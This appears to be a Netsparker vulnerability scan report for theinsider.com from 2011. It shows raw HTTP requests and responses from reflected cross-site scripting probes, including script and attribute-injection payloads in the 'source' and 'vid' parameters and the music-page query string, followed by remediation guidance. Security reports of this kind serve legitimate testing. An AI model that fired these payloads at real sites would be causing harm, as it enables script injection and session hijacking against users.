Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:53 GMT
Content-Length: 11559
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Movie News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="movies" /> <meta name="date" content="2011-10-21 17:41:00" /><meta property="og:title" content="Movie News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/movies/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Movie News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 17:41:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/movies;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/movies;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/movies;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Movies+Channel+Page+http://insdr.co/nuF1qa+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/movies/movies.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/movies/"><img src="/media/img/channel_page_name_v3_movies.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/movies/46996_Cabin_in_the_Woods_trailer/index.html' class='black_text_link'><img src='/media/photo/2011/12/100323/cabin_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46996_Cabin_in_the_Woods_trailer/index.html' class='black_text_link horizontal_excerpt'>'Cabin' in the...Whoa!</a></h4><p>Joss Whedon's long-delayed <em>Cabin in the Woods</em> has taken on almost mythical proportions by this point as fans of both the <em>Buffy </em>creator and horror have heard this film is everything from &quot;a total genre recalibration&quot; to &quot;one of the most inventive horror movies ever made.&quot;</p><a target='_self' href='/movies/46996_Cabin_in_the_Woods_trailer/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='black_text_link'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='black_text_link horizontal_excerpt'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></h4><p>When Daniel Craig stripped down to that teeny mankini for 2006's <em>Casino Royale</em>, the paparazzi were sent into hyper-drive, which might be why D.C. only doffed his top in private for the the 2008 sequel.</p><a target='_self' href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/movies/46963_12_Must_See_December_Movies/index.html' class='black_text_link'><img src='/media/photo/2011/12/99944/416_thegirlwiththedragontattoo_111101_columbiapictures.JPG' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46963_12_Must_See_December_Movies/index.html' class='black_text_link horizontal_excerpt'>12 Must-See December Movies</a></h4><p>12 December movies you absolutely must see!</p><a target='_self' href='/movies/46963_12_Must_See_December_Movies/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/movies/46977_December_4_2011_box_office_Twilight_Muppets_Shame/index.html' class='black_text_link'><img src='/media/photo/2011/12/99912/shame_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/movies/46977_December_4_2011_box_office_Twilight_Muppets_Shame/index.html' class='black_text_link horizontal_excerpt'>NC-17 Rating Can't Stop 'Shame'</a></h4><p>The first mainstream NC-17 film to be released in years, Michael Fassbender's <em>Shame</em>, was the most eventful box office development during the second slowest week of 2011. Despite some of the most popular theater chains refusing to carry the explicit drama, <em>Shame </em><a target='_blank' href='http://www.hollywoodreporter.com/news/twilight-breaking-dawn-muppets-shame-box-office-269418'>scored</a> the week's highest per-theater average ($361,181..
- /coincident_iframe.html

/coincident_iframe.html

http://www.theinsider.com/coincident_iframe.html?source=%27%22%20ns=%20alert(0x0039FE)%20

Parameters

Parameter Type Value
source GET '" ns= alert(0x0039FE)

Request

GET /coincident_iframe.html?source=%27%22%20ns=%20netsparker(0x0039FE)%20 HTTP/1.1
Referer: http://www.theinsider.com/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 07:14:04 GMT
Content-Length: 819
Connection: keep-alive



<style>
.tab {
background: none repeat scroll 0 0 transparent !important;
height: 42px;
position: relative;
top: 0;
z-index: 999;
width: 100%;
}
.win_shift {
border: 0 none;
min-height: 519px;
margin-left: 5px;
width: 965px;
}

.jqmOverlay {
background-color: #000000;
position: fixed !important;
}


.jqmClose {
background: url("/media/img/btn_close3.png") no-repeat scroll 0 0 transparent;
clear: right;
display: block;
height: 30px;
width: 30px;
}
.jqmclosecontain {
display: block;
left: 968px;
position: relative;
top: -10px;
}

#div_video_top {
background-image: url("/media/img/coincident_modal_tp_v1.png");
height: 10px;
width: 998px;
}

#div_video_mid {
background-image: url("/media/img/coincident_modal_md_v1.png");
padding-bottom: 5px;
width: 998px;
}

#div_video_btm {
background-image: url("/media/img/coincident_modal_bt_v1.png");
height: 27px;
width: 998px;
}

#ctvWindow {
border: 0 none;
min-height: 519px;
margin-left: 12px;
/* overflow: hidden; */
width: 965px;
}
<!--[if IE 7 ]>
.jqmWindow {
background-color:transparent !important;
color:#000000;
display:none;
left:-25px;
margin-left:0;
position:relative;
top:-360px;
width:800px;
height: 0px;
}
<![endif]-->
</style>
<script>
function CTV_ctvWindowSize(wSize) {
document.getElementById('ctvWindow').style.height = wSize;
}
</script>
<div style="width: 1025px;">
<div id="div_video_top">
<div class="jqmCloseContain">
<a href="#" class="jqmClose"></a>
</div>
</div>
<div id="div_video_mid">
<div class="win_shift">
<iframe id="ctvWindow" frameborder="0" scrolling="no" src="http://www.theinsider.com/media/flash/coincident/index.html?media=http://www.theinsider.com'" ns= netsparker(0x0039FE) " width="70%" height="527"></iframe>
</div>
</div>
<div id="div_video_btm"></div>
</div>
- /media/flash/visitcalifornia/index.html

/media/flash/visitcalifornia/index.html

http://www.theinsider.com/media/flash/visitcalifornia/index.html?vid=%27%22%20ns=%20alert(0x004CC0)%20

Parameters

Parameter Type Value
vid GET '" ns= alert(0x004CC0)

Request

GET /media/flash/visitcalifornia/index.html?vid=%27%22%20ns=%20netsparker(0x004CC0)%20 HTTP/1.1
Referer: http://www.theinsider.com/visitcalifornia/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Expires: Tue, 06 Dec 2011 07:27:19 GMT
Date: Tue, 06 Dec 2011 07:22:19 GMT
Content-Length: 1099
Connection: keep-alive


<html><head><title>ETonline.com Video Player</title><!-- FreeWheel MRM Javascript --> <script src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1" language="javascript" type="text/javascript"></script></head><body><div class="videomodal_top"></div><div class="videomodal_middle"> <div class="videomodal_vidplayer videopost"> <!-- <div id="'" ns= netsparker(0x004CC0) ">ET Video</div> --> <object id="flashobject" type="application/x-shockwave-flash" allowScriptAccess="always" allowFullScreen="true" allowNetworking="all" height="272" width="431" data="http://r.unicornmedia.com/content.aspx?uid=AC26FE85-334B-4A21-B72C-154F743F5739&at=3dfac371-2d55-42c7-8bd0-a7e5ec424e88"> <param name="quality" value="high" /> <param name="allowFullScreen" value="true" /> <param name="allowScriptAccess" value="always" /> <param name="allowNetworking" value="all" /><param name="movie" value="http://r.unicornmedia.com/content.aspx?uid=AC26FE85-334B-4A21-B72C-154F743F5739&at=3dfac371-2d55-42c7-8bd0-a7e5ec424e88" /> <param name="flashvars" value="config=http://r.unicornmedia.com/embed/3dfac371-2d55-42c7-8bd0-a7e5ec424e88?view=fkey%26view_id='" ns= netsparker(0x004CC0) " /> </object> <div class="videomodal_title"></div> </div> <div class="videomodal_companion"> <span id="medium_rectangle" class="_fwph"> <form id="_fw_form_medium_rectangle" > <input type="hidden" name="_fw_input_medium_rectangle" id="_fw_input_medium_rectangle" value="w=300&h=250&envp=g_js&sflg=-nrpl;"> </form> <span id="_fw_container_medium_rectangle_companion" class="_fwac"> </span> <span id="_fw_container_medium_rectangle" class="_fwac"> <!-- LEAVE THIS AREA EMPTY --> </span> </span> </div><div class='clear'></div></div><div class="videomodal_bottom"></div><div style="display: none;"><script id="myscript" type="text/javascript" src="/includes/s_code.js"></script><script language="JavaScript" type="text/javascript">s.pageName=document.titles.server="www.etonline.com"s.referrer=document.referers.prop1="Video"s.pageURL="http://www.etonline.com/media/flash/visitcalifornia/index.html";var s_code=s.t();if(s_code)document.write(s_code)</script><script language="JavaScript" type="text/javascript"> if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') </script><noscript><img src="http://cbset.112.2O7.net/b/ss/cbset/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript></div></body></html>
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting

65 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- /music/index.html

/music/index.html

http://www.theinsider.com/music/index.html?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00022F)</script>

Request

GET /music/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/search/index.html?sort=date-sdate
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:57 GMT
Content-Length: 11227
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Music News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="music" /> <meta name="date" content="2011-10-21 17:44:00" /><meta property="og:title" content="Music News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/music/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Music News | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 17:44:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/music;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/music;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/music;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Music+Channel+page+http://insdr.co/oeNTrM+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
